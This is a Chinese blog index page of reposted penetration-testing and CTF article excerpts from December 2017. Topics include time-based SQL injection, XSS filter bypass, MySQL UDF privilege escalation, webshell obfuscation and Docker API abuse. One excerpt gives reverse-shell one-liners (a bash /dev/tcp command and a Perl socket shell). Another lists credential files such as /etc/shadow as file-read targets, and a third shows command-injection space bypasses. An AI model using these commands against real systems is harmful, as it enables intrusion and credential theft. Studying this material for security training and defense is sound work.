- 博客(25)
- 资源 (1)
- 收藏
- 关注
RSS订阅转载 mysql无逗号的注入技巧
http://wonderkun.cc/index.html/?p=442在一个 ctf比赛中,遇到这样一个注入题:用户的ip可以用x-forwarded-for来伪造,然后把ip存储到数据库中去,对ip没有进行任何过滤,存在注入,但是有一个限制就是: 用‘,’逗号对ip地址进行分割,仅仅取逗号前面的第一部分内容。然后:没有报错,没有回显,没有bool,只有延时。 送
2017-12-26 20:40:39
6221
1
转载 快速自检电脑是否被黑客入侵过(Windows版)
https://www.pppan.net/blog/detail/2017-11-08-windows-self-check1. 异常的日志记录通常我们需要检查一些可疑的事件记录, 比如:“Event log service was stopped.”(事件记录服务已经停止)“Windows File Protection is not active on this
2017-12-25 13:50:36
10298
转载 快速自检电脑是否被黑客入侵过(Linux版)
http://www.freebuf.com/articles/system/157597.html前言严谨地说, Linux只是一个内核, `GNU Linux`才算完整的操作系统, 但在本文里还是用通俗的叫法,把`Ubuntu`,`Debian`,`RedHat`,`CentOS`,`ArchLinux`等发行版都统称为`Linux`. 本文里所说的方法不仅对Linux的发
2017-12-25 13:49:25
1822
转载 甲方安全防范
http://www.freebuf.com/sectool/157699.html建设好了,言归正传了,没钱还想搞安全,怎么办?用免费的代替呗。下面给大家说我的一下替代方案。1、漏扫:NESSUS为啥放首位了,因为这款漏扫没什么好介绍的,强烈推荐;直接部署在网络当中,路由可达即可。与收费漏扫相比较,扫描结果略有不同,都能扫到对方扫不到的。所以,还是一款值得推荐的免费漏扫。2、入侵检测:OSSIM...
2017-12-25 13:28:06
407
转载 浅谈CTF中命令执行与绕过的小技巧
http://www.freebuf.com/articles/web/137923.html空格绕过 符号%09 符号需要php环境,这里就不搭建啦,见谅)$IFS$9 符号${IFS} 符号这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在linux下表示分隔符,然而我本地实验却会发生这种情况,这里解释一下,单纯的cat$IFS2,bash解
2017-12-23 20:36:46
3640
转载 PHP的libcurl中存在的一些问题
http://wonderkun.cc/index.html/?p=670看了近来的几场ctf题目,学习了一些关于php libcurl的一些知识,在这里总结一下。0x1发送POST请求时造成任意文件读取PHP manual上对CURLOPT_POSTFIELDS 这个选项的描述如下:也就是说当CURLOPT_POSTFIELDS传入的数据是urlencode 的字
2017-12-22 11:18:21
3847
转载 15分钟破解网站验证码
概述 http://www.bugcode.cn/break_captcha.html 很多开发者都讨厌网站的验证码,特别是写网络爬虫的程序员,而网站之所以设置验证码,是为了防止机器人访问网站,造成不必要的损失。现在好了,随着机器学习技术的发展,机器识别验证码的问题比较好解决了。样本采集工具 这里我们采用wordpress的Really Simple CAPTCH
2017-12-22 10:40:57
1459
转载 HTML中,闭合优先的神奇标签
https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650942821&idx=1&sn=8dc047dbb05db818d4b910c51c8811a1&chksm=80796f57b70ee6411190f963d8ec73428e3706a3c78b89650e3a13445474106acc95f2a1707b#rd
2017-12-20 10:46:18
1063
转载 Mysql udf提权(Linux平台)
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限网上有些文章利用的是sqlmap-master\udf\mysq
2017-12-17 20:03:43
23983
3
转载 XSS过滤绕过速查表
1.介绍这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Ch
2017-12-16 22:51:42
4092
转载 命令行下收集主机信息
使用wmic识别安装到系统中的补丁情况C:\> wmic qfe get description,installedOn识别正在运行的服务C:\>sc query type= serviceC:\>net start识别开机启动的程序,包括路径C:\>wmic startup list fullping探测存活主机D:\>for /L %I in (100,1,254
2017-12-15 10:25:59
1143
转载 各种语言一句话反弹shell
Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功]bash -i >& /dev/tcp/10.0.0.1/8080 0>&1PERLperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_
2017-12-15 10:24:53
1041
转载 文件读取漏洞路径收集
代码在做渗透测试当中会在某些情况可以读取系统文件,例如MySQL注入当中利用load_file函数读取系统文件,或者服务器配置不当参考:新型任意文件读取漏洞的研究这里收集一下服务器通常存在的文件,可以通过读取相关敏感文件达到快速获取信息的目的。/etc/passwd/etc/shadow/etc/issue/etc/fstab/etc/host.conf/etc/motd/et
2017-12-15 10:19:49
4153
转载 Pwn基础知识笔记
http://www.jianshu.com/p/6e528b33e37apwntools简单语法作为最好用的pwn工具,简单记一下用法:连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制IO模块:这个比较容易跟zio搞混,记住zio是re
2017-12-15 10:03:23
4559
转载 文件包含漏洞 TIPS
https://www.chery666.cn/blog/2017/06/17/include.html0x01 原理网页代码在通过函数复用文件时,未对文件名进行安全检查时,从而导致恶意代码执行和敏感信息泄露。主要分为本地包含(LFI)和远程包含 (RFI)涉及到的危险函数:include(),require() 和 include_once(),require_onc
2017-12-14 11:49:54
2143
转载 代码审计 TIPS(1)
https://www.chery666.cn/blog/2017/12/11/Code-audit.html0x01 PHP 敏感配置项register_globals(php 版本小于 5.4 时存在)当该配置项为 ON 时,会把用户通过 GET、POST 提交的参数自动注册成全局变量。当代码中存在有未初始化的变量时,可能会导致变量覆盖的问题;(PS: 其中
2017-12-14 11:33:22
906
转载 HTTPS的APP如何抓包
https://mp.weixin.qq.com/s/0_uwha9VWgkQhQcpr80UPw 前面看到几位基友在问app是https协议的如何抓包,在这我就讲一下自己抓包的三钟方法。一、将burp的证书导入到手机中在浏览器中访问burp设置的代理地址点击CA certificate下载burpsuite的证书,保存证书文件
2017-12-13 23:21:33
3198
原创 python raw_input or input With name 'abc' is not defined
>>> a = raw_input()asdasdwwhoami>>> a'asdasdwwhoami'>>> a = input()qweqweqweTraceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name 'qweqweqwe' is not de
2017-12-11 11:21:01
330
转载 渗透技巧——Windows系统的帐户隐藏
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/0x00 前言在之前的文章《渗透技巧——Windows系统远
2017-12-10 14:48:14
7235
转载 PHP WebShell变形技术总结
http://www.freebuf.com/articles/web/155891.html简介WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为
2017-12-09 12:05:41
1532
转载 php://filter 使用
0x00 前言php://filter是PHP中的一个协议,利用这个协议我们可以解决一些ctf的题目,或者挖掘出一些漏洞。0x01 php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流。必选
2017-12-04 10:03:42
4569
转载 Rsync安全配置&利用
1、Rsync简介Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,提高其保密性。此外,rsync是一款免费的软件。rsync 包括如下的一些特性:
2017-12-03 19:32:14
832
转载 挖洞经验 | 命令注入突破长度限制
0×01 背景http://www.freebuf.com/articles/web/154453.html很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云
2017-12-03 15:19:59
2487
转载 利用CouchDB未授权访问漏洞执行任意系统命令
0x00 前言5月16日阿里云盾攻防对抗团队从外部渠道获知CouchDB数据库存在未授权访问漏洞(在配置不正确的情况下)。经过测试,云盾团队率先发现利用该未授权访问漏洞不仅会造成数据的丢失和泄露,甚至可执行任意系统命令。云盾安全专家团队第一时间完成了漏洞上报、安全评级,并通知了所有可能受影响的用户。下面将对该漏洞的出处和技术细节做详细解释。http://static.hx99.net/
2017-12-01 12:50:11
2832
转载 Docker Remote API未授权访问漏洞分析和利用
0x00 概述最近提交了一些关于 docker remote api 未授权访问导致代码泄露、获取服务器root权限的漏洞,造成的影响都比较严重,比如新姿势之获取果壳全站代码和多台机器root权限新姿势之控制蜻蜓fm所有服务器新姿势之获取百度机器root权限因为之前关注这一块的人并不多,这个方法可以算是一个“新的姿势”,本文对漏洞产生的原因和利用过程进行
2017-12-01 12:45:33
11071
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人